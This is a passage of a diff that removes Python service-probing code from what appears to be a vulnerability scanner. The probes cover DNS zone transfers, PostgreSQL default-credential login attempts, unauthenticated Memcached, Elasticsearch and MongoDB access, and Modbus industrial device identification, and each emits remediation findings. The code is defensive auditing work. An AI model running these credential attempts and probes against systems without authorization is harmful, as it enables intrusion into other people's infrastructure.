self._snmp_build_getnext("public", oid) - sock.sendto(pkt, (target, port)) - try: - resp, _ = sock.recvfrom(1024) - except socket.timeout: - break - resp_oid, resp_val = self._snmp_parse_response(resp) - if resp_oid is None or not resp_oid.startswith(prefix + "."): - break - results.append((resp_oid, resp_val)) - oid = resp_oid - return results - - # Walk system MIB subtree - for resp_oid, resp_val in _walk("1.3.6.1.2.1.1"): - base = ".".join(resp_oid.split(".")[:8]) - name = self._SYSTEM_OID_NAMES.get(base) - if name: - system[name] = resp_val - - sys_descr = system.get("sysDescr", "") - if sys_descr: - self._emit_metadata("os_claims", f"snmp:{port}", sys_descr) - if self._is_ics_indicator(sys_descr): - walk_findings.append(Finding( - severity=Severity.HIGH, - title="SNMP exposes ICS/SCADA device identity", - description=f"sysDescr contains ICS keywords: {sys_descr[:120]}", - evidence=f"sysDescr={sys_descr[:120]}", - remediation="Isolate ICS devices from general network; restrict SNMP access.", - confidence="firm", - )) - - # Walk ipAddrTable for interface IPs - for resp_oid, resp_val in _walk("1.3.6.1.2.1.4.20.1.1"): - try: - addr = _ipaddress.ip_address(resp_val) - except (ValueError, TypeError): - continue - if addr.is_private: - self._emit_metadata("internal_ips", {"ip": str(addr), "source": f"snmp_interface:{port}"}) - walk_findings.append(Finding( - severity=Severity.MEDIUM, - title=f"SNMP leaks internal IP address {addr}", - description="Interface IP from ipAddrTable is RFC1918, revealing internal topology.", - evidence=f"ipAddrEntry={resp_val}", - remediation="Restrict SNMP read access; filter sensitive MIBs.", - confidence="certain", - )) - except Exception: - pass - finally: - if sock is not None: - sock.close() - if not system and not walk_findings: - return None - return {"system": system, "findings": walk_findings} - - def _service_info_dns(self, target, port): # default port: 53 - """ - Query CHAOS TXT version.bind to detect DNS version disclosure. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None, "dns_version": None} - sock = None - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - sock.settimeout(2) - tid = random.randint(0, 0xffff) - header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) - qname = b'\x07version\x04bind\x00' - question = struct.pack('>HH', 16, 3) - packet = header + qname + question - sock.sendto(packet, (target, port)) - data, _ = sock.recvfrom(512) - - # Parse CHAOS TXT response - parsed = False - if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid: - ancount = struct.unpack('>H', data[6:8])[0] - if ancount: - idx = 12 + len(qname) + 4 - if idx < len(data): - if data[idx] & 0xc0 == 0xc0: - idx += 2 - else: - while idx < len(data) and data[idx] != 0: - idx += data[idx] + 1 - idx += 1 - idx += 8 - if idx + 2 <= len(data): - rdlength = struct.unpack('>H', data[idx:idx+2])[0] - idx += 2 - if idx < len(data): - txt_length = data[idx] - txt = data[idx+1:idx+1+txt_length].decode('utf-8', errors='ignore') - if txt: - raw["dns_version"] = txt - raw["banner"] = f"DNS version: {txt}" - findings.append(Finding( - severity=Severity.LOW, - title=f"DNS version disclosure: {txt}", - description=f"CHAOS TXT version.bind query reveals DNS software version.", - evidence=f"version.bind TXT: {txt}", - remediation="Disable version.bind responses in the DNS server configuration.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="certain", - )) - parsed = True - # CVE check — version.bind is BIND-specific - _bind_m = _re.search(r'(\d+\.\d+(?:\.\d+)*)', txt) - if _bind_m: - findings += check_cves("bind", _bind_m.group(1)) - - # Fallback: check raw data for version keywords - if not parsed: - readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data) - if 'bind' in readable.lower() or 'version' in readable.lower(): - raw["banner"] = readable.strip()[:80] - findings.append(Finding( - severity=Severity.LOW, - title="DNS version disclosure via CHAOS TXT", - description=f"CHAOS TXT response on {target}:{port} contains version keywords.", - evidence=f"Response contains: {readable.strip()[:80]}", - remediation="Disable version.bind responses in the DNS server configuration.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="firm", - )) - else: - raw["banner"] = "DNS service responding" - findings.append(Finding( - severity=Severity.INFO, - title="DNS CHAOS TXT query did not disclose version", - description=f"DNS on {target}:{port} responded but did not reveal version.", - confidence="firm", - )) - except socket.timeout: - return probe_error(target, port, "DNS", Exception("CHAOS query timed out")) - except Exception as e: - return probe_error(target, port, "DNS", e) - finally: - if sock is not None: - sock.close() - - # --- DNS zone transfer (AXFR) test --- - axfr_findings = self._dns_test_axfr(target, port) - findings += axfr_findings - - # --- Open recursive resolver test --- - resolver_finding = self._dns_test_open_resolver(target, port) - if resolver_finding: - findings.append(resolver_finding) - - return probe_result(raw_data=raw, findings=findings) - - def _dns_discover_zones(self, target, port): - """Discover zone names the DNS server is authoritative for. - - Strategy: send SOA queries for a set of candidate domains and check - for authoritative (AA-flag) responses. This is far more reliable than - reverse-DNS guessing when the target serves non-obvious zones. - - Returns list of domain strings (may be empty). - """ - candidates = set() - - # 1. Reverse DNS of target → extract domain - try: - import socket as _socket - hostname, _, _ = _socket.gethostbyaddr(target) - parts = hostname.split(".") - if len(parts) >= 2: - candidates.add(".".join(parts[-2:])) - if len(parts) >= 3: - candidates.add(".".join(parts[-3:])) - except Exception: - pass - - # 2. Common pentest / CTF domains - candidates.update(["vulhub.org", "example.com", "test.local"]) - - # 3. Probe each candidate with a SOA query — keep only authoritative hits - authoritative = [] - for domain in list(candidates): - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - sock.settimeout(2) - tid = random.randint(0, 0xffff) - header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) - qname = b"" - for label in domain.split("."): - qname += bytes([len(label)]) + label.encode() - qname += b"\x00" - question = struct.pack('>HH', 6, 1) # QTYPE=SOA, QCLASS=IN - sock.sendto(header + qname + question, (target, port)) - data, _ = sock.recvfrom(512) - sock.close() - if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid: - flags = struct.unpack('>H', data[2:4])[0] - aa = (flags >> 10) & 1 # Authoritative Answer - rcode = flags & 0x0F - ancount = struct.unpack('>H', data[6:8])[0] - if aa and rcode == 0 and ancount > 0: - authoritative.append(domain) - except Exception: - pass - - # Return authoritative zones first, then remaining candidates as fallback - seen = set(authoritative) - result = list(authoritative) - for d in candidates: - if d not in seen: - result.append(d) - return result - - def _dns_test_axfr(self, target, port): - """Attempt DNS zone transfer (AXFR) via TCP. - - Uses SOA-based zone discovery to find authoritative zones before - attempting AXFR, falling back to reverse DNS and common domains. - - Returns list of findings. - """ - findings = [] - - test_domains = self._dns_discover_zones(target, port) - - for domain in test_domains[:4]: # Test at most 4 domains - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - - # Build AXFR query - tid = random.randint(0, 0xffff) - header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) - # Encode domain name - qname = b"" - for label in domain.split("."): - qname += bytes([len(label)]) + label.encode() - qname += b"\x00" - # QTYPE=252 (AXFR), QCLASS=1 (IN) - question = struct.pack('>HH', 252, 1) - dns_query = header + qname + question - # TCP DNS: 2-byte length prefix - sock.sendall(struct.pack(">H", len(dns_query)) + dns_query) - - # Read response - resp_len_bytes = sock.recv(2) - if len(resp_len_bytes) < 2: - sock.close() - continue - resp_len = struct.unpack(">H", resp_len_bytes)[0] - resp_data = b"" - while len(resp_data) < resp_len: - chunk = sock.recv(resp_len - len(resp_data)) - if not chunk: - break - resp_data += chunk - sock.close() - - # Parse: check if we got answers (ancount > 0) and no error (rcode = 0) - if len(resp_data) >= 12: - resp_tid = struct.unpack(">H", resp_data[0:2])[0] - flags = struct.unpack(">H", resp_data[2:4])[0] - rcode = flags & 0x0F - ancount = struct.unpack(">H", resp_data[6:8])[0] - - if resp_tid == tid and rcode == 0 and ancount > 0: - findings.append(Finding( - severity=Severity.HIGH, - title=f"DNS zone transfer (AXFR) allowed for {domain}", - description=f"DNS on {target}:{port} permits zone transfers for '{domain}'. " - "This leaks all DNS records — hostnames, IPs, mail servers, internal infrastructure.", - evidence=f"AXFR query returned {ancount} answer records for {domain}.", - remediation="Restrict zone transfers to authorized secondary nameservers only (allow-transfer).", - owasp_id="A01:2021", - cwe_id="CWE-200", - confidence="certain", - )) - break # One confirmed AXFR is enough - except Exception: - continue - - return findings - - def _dns_test_open_resolver(self, target, port): - """Test if DNS server acts as an open recursive resolver. - - Returns Finding or None. - """ - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - sock.settimeout(2) - tid = random.randint(0, 0xffff) - # Standard recursive query for example.com A record - header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) # RD=1 - qname = b'\x07example\x03com\x00' - question = struct.pack('>HH', 1, 1) # QTYPE=A, QCLASS=IN - packet = header + qname + question - sock.sendto(packet, (target, port)) - data, _ = sock.recvfrom(512) - sock.close() - - if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid: - flags = struct.unpack('>H', data[2:4])[0] - qr = (flags >> 15) & 1 - rcode = flags & 0x0F - ancount = struct.unpack('>H', data[6:8])[0] - ra = (flags >> 7) & 1 # Recursion Available - - if qr == 1 and rcode == 0 and ancount > 0 and ra == 1: - return Finding( - severity=Severity.MEDIUM, - title="DNS open recursive resolver detected", - description=f"DNS on {target}:{port} recursively resolves queries for external domains. " - "Open resolvers can be abused for DNS amplification DDoS attacks.", - evidence=f"Recursive query for example.com returned {ancount} answers with RA flag set.", - remediation="Restrict recursive queries to authorized clients only (allow-recursion).", - owasp_id="A05:2021", - cwe_id="CWE-406", - confidence="certain", - ) - except Exception: - pass - return None - - def _service_info_mssql(self, target, port): # default port: 1433 - """ - Send a TDS prelogin probe to expose SQL Server version data. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - prelogin = bytes.fromhex( - "1201001600000000000000000000000000000000000000000000000000000000" - ) - sock.sendall(prelogin) - data = sock.recv(256) - if data: - readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data) - raw["banner"] = f"MSSQL prelogin response: {readable.strip()[:80]}" - findings.append(Finding( - severity=Severity.MEDIUM, - title="MSSQL prelogin handshake succeeded", - description=f"SQL Server on {target}:{port} responds to TDS prelogin, " - "exposing version metadata and confirming the service is reachable.", - evidence=f"Prelogin response: {readable.strip()[:80]}", - remediation="Restrict SQL Server access to trusted networks; use firewall rules.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="certain", - )) - sock.close() - except Exception as e: - return probe_error(target, port, "MSSQL", e) - return probe_result(raw_data=raw, findings=findings) - - - def _service_info_postgresql(self, target, port): # default port: 5432 - """ - Probe PostgreSQL authentication method and extract server version. - - Sends a v3 StartupMessage for user 'postgres'. The server replies with - an authentication request (type 'R') optionally followed by ParameterStatus - messages (type 'S') that include ``server_version``. - - Auth codes: - 0 = AuthenticationOk (trust auth) → CRITICAL - 3 = CleartextPassword → MEDIUM - 5 = MD5Password → INFO (adequate, prefer SCRAM) - 10 = SASL (SCRAM-SHA-256) → INFO (strong) - """ - findings = [] - raw = {"auth_type": None, "version": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - payload = b'user\x00postgres\x00database\x00postgres\x00\x00' - startup = struct.pack('!I', len(payload) + 8) + struct.pack('!I', 196608) + payload - sock.sendall(startup) - # Read enough to get auth response + parameter status messages - data = b"" - try: - while len(data) < 4096: - chunk = sock.recv(4096) - if not chunk: - break - data += chunk - # Stop after we see auth request — parameters come after for trust auth - # but for password auth the server sends R then waits. - if len(data) >= 9 and data[0:1] == b'R': - auth_code = struct.unpack('!I', data[5:9])[0] - if auth_code != 0: - break # Server wants a password — no more data coming - except (socket.timeout, OSError): - pass - sock.close() - - # --- Extract version from ParameterStatus ('S') messages --- - # Format: 'S' + int32 length + key\0 + value\0 - pg_version = None - pos = 0 - while pos < len(data) - 5: - msg_type = data[pos:pos+1] - if msg_type not in (b'R', b'S', b'K', b'Z', b'E', b'N'): - break - msg_len = struct.unpack('!I', data[pos+1:pos+5])[0] - msg_end = pos + 1 + msg_len - if msg_type == b'S' and msg_end <= len(data): - kv = data[pos+5:msg_end] - parts = kv.split(b'\x00') - if len(parts) >= 2: - key = parts[0].decode('utf-8', errors='ignore') - val = parts[1].decode('utf-8', errors='ignore') - if key == 'server_version': - pg_version = val - raw["version"] = pg_version - pos = msg_end - if pos >= len(data): - break - - # --- Parse auth response --- - if len(data) >= 9 and data[0:1] == b'R': - auth_code = struct.unpack('!I', data[5:9])[0] - raw["auth_type"] = auth_code - if auth_code == 0: - findings.append(Finding( - severity=Severity.CRITICAL, - title="PostgreSQL trust authentication (no password)", - description=f"PostgreSQL on {target}:{port} accepts connections without any password (auth code 0).", - evidence=f"Auth response code: {auth_code}", - remediation="Configure pg_hba.conf to require password or SCRAM authentication.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - elif auth_code == 3: - findings.append(Finding( - severity=Severity.MEDIUM, - title="PostgreSQL cleartext password authentication", - description=f"PostgreSQL on {target}:{port} requests cleartext passwords.", - evidence=f"Auth response code: {auth_code}", - remediation="Switch to SCRAM-SHA-256 authentication in pg_hba.conf.", - owasp_id="A02:2021", - cwe_id="CWE-319", - confidence="certain", - )) - elif auth_code == 5: - findings.append(Finding( - severity=Severity.INFO, - title="PostgreSQL MD5 authentication", - description="MD5 password auth is adequate but SCRAM-SHA-256 is preferred.", - evidence=f"Auth response code: {auth_code}", - remediation="Consider upgrading to SCRAM-SHA-256.", - confidence="certain", - )) - elif auth_code == 10: - findings.append(Finding( - severity=Severity.INFO, - title="PostgreSQL SASL/SCRAM authentication", - description="Strong authentication (SCRAM-SHA-256) is in use.", - evidence=f"Auth response code: {auth_code}", - confidence="certain", - )) - elif b'AuthenticationCleartextPassword' in data: - raw["auth_type"] = "cleartext_text" - findings.append(Finding( - severity=Severity.MEDIUM, - title="PostgreSQL cleartext password authentication", - description=f"PostgreSQL on {target}:{port} requests cleartext passwords.", - evidence="Text response contained AuthenticationCleartextPassword", - remediation="Switch to SCRAM-SHA-256 authentication.", - owasp_id="A02:2021", - cwe_id="CWE-319", - confidence="firm", - )) - elif b'AuthenticationOk' in data: - raw["auth_type"] = "ok_text" - findings.append(Finding( - severity=Severity.CRITICAL, - title="PostgreSQL trust authentication (no password)", - description=f"PostgreSQL on {target}:{port} accepted connection without authentication.", - evidence="Text response contained AuthenticationOk", - remediation="Configure pg_hba.conf to require password authentication.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="firm", - )) - - # --- Version disclosure --- - if pg_version: - findings.append(Finding( - severity=Severity.LOW, - title=f"PostgreSQL version disclosed: {pg_version}", - description=f"PostgreSQL on {target}:{port} reports version {pg_version}.", - evidence=f"server_version parameter: {pg_version}", - remediation="Restrict network access to the PostgreSQL port.", - cwe_id="CWE-200", - confidence="certain", - )) - # Extract numeric version for CVE matching - ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', pg_version) - if ver_match: - for f in check_cves("postgresql", ver_match.group(1)): - findings.append(f) - - if not findings: - findings.append(Finding(Severity.INFO, "PostgreSQL probe completed", "No auth weakness detected.")) - except Exception as e: - return probe_error(target, port, "PostgreSQL", e) - - return probe_result(raw_data=raw, findings=findings) - - def _service_info_postgresql_creds(self, target, port): # default port: 5432 - """ - PostgreSQL default credential testing (opt-in via active_auth feature group). - - Attempts cleartext password auth with common defaults. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"tested_credentials": 0, "accepted_credentials": []} - creds = [("postgres", ""), ("postgres", "postgres"), ("postgres", "password")] - - for username, password in creds: - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - payload = f'user\x00{username}\x00database\x00postgres\x00\x00'.encode() - startup = struct.pack('!I', len(payload) + 8) + struct.pack('!I', 196608) + payload - sock.sendall(startup) - data = sock.recv(128) - - if len(data) >= 9 and data[0:1] == b'R': - auth_code = struct.unpack('!I', data[5:9])[0] - if auth_code == 0: - cred_str = f"{username}:(empty)" if not password else f"{username}:{password}" - raw["accepted_credentials"].append(cred_str) - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"PostgreSQL trust auth for {username}", - description=f"No password required for user {username}.", - evidence=f"Auth code 0 for {cred_str}", - remediation="Configure pg_hba.conf to require authentication.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - elif auth_code == 3: - # Send cleartext password - pwd_bytes = password.encode() + b'\x00' - pwd_msg = b'p' + struct.pack('!I', len(pwd_bytes) + 4) + pwd_bytes - sock.sendall(pwd_msg) - resp = sock.recv(4096) - if resp and resp[0:1] == b'R' and len(resp) >= 9: - result_code = struct.unpack('!I', resp[5:9])[0] - if result_code == 0: - cred_str = f"{username}:{password}" if password else f"{username}:(empty)" - raw["accepted_credentials"].append(cred_str) - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"PostgreSQL default credential accepted: {cred_str}", - description=f"Cleartext password auth accepted for {cred_str}.", - evidence=f"Auth OK for {cred_str}", - remediation="Change default passwords.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - findings += self._pg_extract_version_findings(resp) - elif auth_code == 5 and len(data) >= 13: - # MD5 auth: server sends 4-byte salt at bytes 9:13 - import hashlib - salt = data[9:13] - inner = hashlib.md5(password.encode() + username.encode()).hexdigest() - outer = 'md5' + hashlib.md5(inner.encode() + salt).hexdigest() - pwd_bytes = outer.encode() + b'\x00' - pwd_msg = b'p' + struct.pack('!I', len(pwd_bytes) + 4) + pwd_bytes - sock.sendall(pwd_msg) - resp = sock.recv(4096) - if resp and resp[0:1] == b'R' and len(resp) >= 9: - result_code = struct.unpack('!I', resp[5:9])[0] - if result_code == 0: - cred_str = f"{username}:{password}" if password else f"{username}:(empty)" - raw["accepted_credentials"].append(cred_str) - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"PostgreSQL default credential accepted: {cred_str}", - description=f"MD5 password auth accepted for {cred_str}.", - evidence=f"Auth OK for {cred_str}", - remediation="Change default passwords.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - findings += self._pg_extract_version_findings(resp) - raw["tested_credentials"] += 1 - sock.close() - except Exception: - continue - - if not findings: - findings.append(Finding( - severity=Severity.INFO, - title="PostgreSQL default credentials rejected", - description=f"Tested {raw['tested_credentials']} credential pairs.", - confidence="certain", - )) - - return probe_result(raw_data=raw, findings=findings) - - def _pg_extract_version_findings(self, data): - """Parse ParameterStatus messages after PG auth success for version + CVEs.""" - findings = [] - pos = 0 - while pos < len(data) - 5: - msg_type = data[pos:pos+1] - if msg_type not in (b'R', b'S', b'K', b'Z', b'E', b'N'): - break - msg_len = struct.unpack('!I', data[pos+1:pos+5])[0] - msg_end = pos + 1 + msg_len - if msg_type == b'S' and msg_end <= len(data): - kv = data[pos+5:msg_end] - parts = kv.split(b'\x00') - if len(parts) >= 2: - key = parts[0].decode('utf-8', errors='ignore') - val = parts[1].decode('utf-8', errors='ignore') - if key == 'server_version': - findings.append(Finding( - severity=Severity.LOW, - title=f"PostgreSQL version disclosed: {val}", - description=f"PostgreSQL reports version {val} (via authenticated session).", - evidence=f"server_version parameter: {val}", - remediation="Restrict network access to the PostgreSQL port.", - cwe_id="CWE-200", - confidence="certain", - )) - ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', val) - if ver_match: - findings += check_cves("postgresql", ver_match.group(1)) - break - pos = msg_end - if pos >= len(data): - break - return findings - - def _service_info_memcached(self, target, port): # default port: 11211 - """ - Issue Memcached stats command to detect unauthenticated access. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(2) - sock.connect((target, port)) - - # Extract version - sock.sendall(b'version\r\n') - ver_data = sock.recv(64).decode("utf-8", errors="replace").strip() - ver_match = _re.match(r'VERSION\s+(\d+(?:\.\d+)+)', ver_data) - if ver_match: - raw["version"] = ver_match.group(1) - findings.append(Finding( - severity=Severity.LOW, - title=f"Memcached version disclosed: {raw['version']}", - description=f"Memcached on {target}:{port} reveals version via VERSION command.", - evidence=f"VERSION {raw['version']}", - remediation="Restrict access to memcached to trusted networks.", - cwe_id="CWE-200", - confidence="certain", - )) - findings += check_cves("memcached", raw["version"]) - - sock.sendall(b'stats\r\n') - data = sock.recv(128) - if data.startswith(b'STAT'): - raw["banner"] = data.decode("utf-8", errors="replace").strip()[:120] - findings.append(Finding( - severity=Severity.HIGH, - title="Memcached stats accessible without authentication", - description=f"Memcached on {target}:{port} responds to stats without authentication, " - "exposing cache metadata and enabling cache poisoning or data exfiltration.", - evidence=f"stats command returned: {raw['banner'][:80]}", - remediation="Bind Memcached to localhost or use SASL authentication; restrict network access.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - else: - raw["banner"] = "Memcached port open" - findings.append(Finding( - severity=Severity.INFO, - title="Memcached port open", - description=f"Memcached port {port} is open on {target} but stats command was not accepted.", - evidence=f"Response: {data[:60].decode('utf-8', errors='replace')}", - confidence="firm", - )) - sock.close() - except Exception as e: - return probe_error(target, port, "Memcached", e) - return probe_result(raw_data=raw, findings=findings) - - - def _service_info_elasticsearch(self, target, port): # default port: 9200 - """ - Deep Elasticsearch probe: cluster info, index listing, node IPs, CVE matching. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings, raw = [], {"cluster_name": None, "version": None} - base_url = f"http://{target}" if port == 80 else f"http://{target}:{port}" - - # First check if this is actually Elasticsearch (GET / must return JSON with cluster_name or tagline) - findings += self._es_check_root(base_url, raw) - if not raw["cluster_name"] and not raw.get("tagline"): - # Not Elasticsearch — skip further probing to avoid noise on regular HTTP ports - return None - - findings += self._es_check_indices(base_url, raw) - findings += self._es_check_nodes(base_url, raw) - - if raw["version"]: - findings += check_cves("elasticsearch", raw["version"]) - - if not findings: - findings.append(Finding(Severity.INFO, "Elasticsearch probe clean", "No issues detected.")) - - return probe_result(raw_data=raw, findings=findings) - - def _es_check_root(self, base_url, raw): - """GET / — extract version, cluster name.""" - findings = [] - try: - resp = requests.get(base_url, timeout=3) - if resp.ok: - try: - data = resp.json() - raw["cluster_name"] = data.get("cluster_name") - ver_info = data.get("version", {}) - raw["version"] = ver_info.get("number") if isinstance(ver_info, dict) else None - raw["tagline"] = data.get("tagline") - findings.append(Finding( - severity=Severity.HIGH, - title=f"Elasticsearch cluster metadata exposed", - description=f"Cluster '{raw['cluster_name']}' version {raw['version']} accessible without auth.", - evidence=f"cluster={raw['cluster_name']}, version={raw['version']}", - remediation="Enable X-Pack security or restrict network access.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except Exception: - if 'cluster_name' in resp.text: - findings.append(Finding( - severity=Severity.HIGH, - title="Elasticsearch cluster metadata exposed", - description=f"Cluster metadata accessible at {base_url}.", - evidence=resp.text[:200], - remediation="Enable authentication.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="firm", - )) - except Exception: - pass - return findings - - def _es_check_indices(self, base_url, raw): - """GET /_cat/indices — list accessible indices.""" - findings = [] - try: - resp = requests.get(f"{base_url}/_cat/indices?v", timeout=3) - if resp.ok and resp.text.strip(): - lines = resp.text.strip().split("\n") - index_count = max(0, len(lines) - 1) # subtract header - raw["index_count"] = index_count - if index_count > 0: - findings.append(Finding( - severity=Severity.HIGH, - title=f"Elasticsearch {index_count} indices accessible", - description=f"{index_count} indices listed without authentication.", - evidence="\n".join(lines[:6]), - remediation="Enable authentication and restrict index access.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except Exception: - pass - return findings - - def _es_check_nodes(self, base_url, raw): - """GET /_nodes — extract transport/publish addresses, classify IPs, check JVM.""" - findings = [] - try: - resp = requests.get(f"{base_url}/_nodes", timeout=3) - if resp.ok: - data = resp.json() - nodes = data.get("nodes", {}) - ips = set() - for node in nodes.values(): - for key in ("transport_address", "publish_address", "host"): - val = node.get(key) or "" - ip = val.rsplit(":", 1)[0] if ":" in val else val - if ip and ip not in ("127.0.0.1", "localhost", "0.0.0.0"): - ips.add(ip) - settings = node.get("settings", {}) - if isinstance(settings, dict): - net = settings.get("network", {}) - if isinstance(net, dict): - for k in ("host", "publish_host"): - v = net.get(k) - if v and v not in ("127.0.0.1", "localhost", "0.0.0.0"): - ips.add(v) - - if ips: - import ipaddress as _ipaddress - raw["node_ips"] = list(ips) - public_ips, private_ips = [], [] - for ip_str in ips: - try: - is_priv = _ipaddress.ip_address(ip_str).is_private - except (ValueError, TypeError): - is_priv = True # assume private on parse failure - if is_priv: - private_ips.append(ip_str) - else: - public_ips.append(ip_str) - self._emit_metadata("internal_ips", {"ip": ip_str, "source": "es_nodes"}) - - if public_ips: - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"Elasticsearch leaks real public IP: {', '.join(sorted(public_ips)[:3])}", - description="The _nodes endpoint exposes public IP addresses, potentially revealing " - "the real infrastructure behind NAT/VPN/honeypot.", - evidence=f"Public IPs: {', '.join(sorted(public_ips))}", - remediation="Restrict /_nodes endpoint; configure network.publish_host to a safe value.", - owasp_id="A01:2021", - cwe_id="CWE-200", - confidence="certain", - )) - if private_ips: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"Elasticsearch node internal IPs disclosed ({len(private_ips)})", - description=f"Node API exposes internal IPs: {', '.join(sorted(private_ips)[:5])}", - evidence=f"IPs: {', '.join(sorted(private_ips)[:10])}", - remediation="Restrict /_nodes endpoint access.", - owasp_id="A01:2021", - cwe_id="CWE-200", - confidence="certain", - )) - - # --- JVM version extraction --- - for node in nodes.values(): - jvm = node.get("jvm", {}) - if isinstance(jvm, dict): - jvm_version = jvm.get("version") - if jvm_version: - raw["jvm_version"] = jvm_version - try: - if jvm_version.startswith("1."): - # Java 1.x format: 1.7.0_55 → major=7, 1.8.0_345 → major=8 - major = int(jvm_version.split(".")[1]) - else: - # Modern format: 17.0.5 → major=17 - major = int(str(jvm_version).split(".")[0]) - if major <= 8: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"Elasticsearch running on EOL JVM: Java {jvm_version}", - description=f"Java {jvm_version} is end-of-life and no longer receives security patches.", - evidence=f"jvm.version={jvm_version}", - remediation="Upgrade to a supported Java LTS release (17+).", - owasp_id="A06:2021", - cwe_id="CWE-1104", - confidence="certain", - )) - except (ValueError, IndexError): - pass - break # one node is enough - except Exception: - pass - return findings - - - def _service_info_modbus(self, target, port): # default port: 502 - """ - Send Modbus device identification request to detect exposed PLCs. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - request = b'\x00\x01\x00\x00\x00\x06\x01\x2b\x0e\x01\x00' - sock.sendall(request) - data = sock.recv(256) - if data: - readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data) - raw["banner"] = readable.strip()[:120] - findings.append(Finding( - severity=Severity.CRITICAL, - title="Modbus device responded to identification request", - description=f"Industrial control system on {target}:{port} is accessible without authentication. " - "Modbus has no built-in security — any network access means full device control.", - evidence=f"Device ID response: {readable.strip()[:80]}", - remediation="Isolate Modbus devices on a dedicated OT network; deploy a Modbus-aware firewall.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - sock.close() - except Exception as e: - return probe_error(target, port, "Modbus", e) - return probe_result(raw_data=raw, findings=findings) - - - def _service_info_mongodb(self, target, port): # default port: 27017 - """ - Attempt MongoDB isMaster + buildInfo to detect unauthenticated access - and extract the server version for CVE matching. - """ - findings = [] - raw = {"banner": None, "version": None} - try: - # --- Pass 1: isMaster --- - is_master = False - data = self._mongodb_query(target, port, b'isMaster') - if data and (b'ismaster' in data or b'isMaster' in data): - is_master = True - - if is_master: - raw["banner"] = "MongoDB isMaster response" - findings.append(Finding( - severity=Severity.CRITICAL, - title="MongoDB unauthenticated access (isMaster responded)", - description=f"MongoDB on {target}:{port} accepts commands without authentication, " - "allowing full database read/write access.", - evidence="isMaster command succeeded without credentials.", - remediation="Enable MongoDB authentication (--auth) and bind to localhost or trusted networks.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - - # --- Pass 2: buildInfo (for version) --- - build_data = self._mongodb_query(target, port, b'buildInfo') - mongo_version = self._mongodb_extract_bson_string(build_data, b'version') - if mongo_version: - raw["version"] = mongo_version - findings.append(Finding( - severity=Severity.LOW, - title=f"MongoDB version disclosed: {mongo_version}", - description=f"MongoDB on {target}:{port} reports version {mongo_version}.", - evidence=f"buildInfo version: {mongo_version}", - remediation="Restrict network access to the MongoDB port.", - cwe_id="CWE-200", - confidence="certain", - )) - ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', mongo_version) - if ver_match: - for f in check_cves("mongodb", ver_match.group(1)): - findings.append(f) - - except Exception as e: - return probe_error(target, port, "MongoDB", e) - return probe_result(raw_data=raw, findings=findings) - - @staticmethod - def _mongodb_query(target, port, command_name): - """Send a MongoDB OP_QUERY command and return the raw response bytes.""" - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - # Build BSON: {: 1} - field = b'\x10' + command_name + b'\x00' + struct.pack(' len(data): - return None - str_len 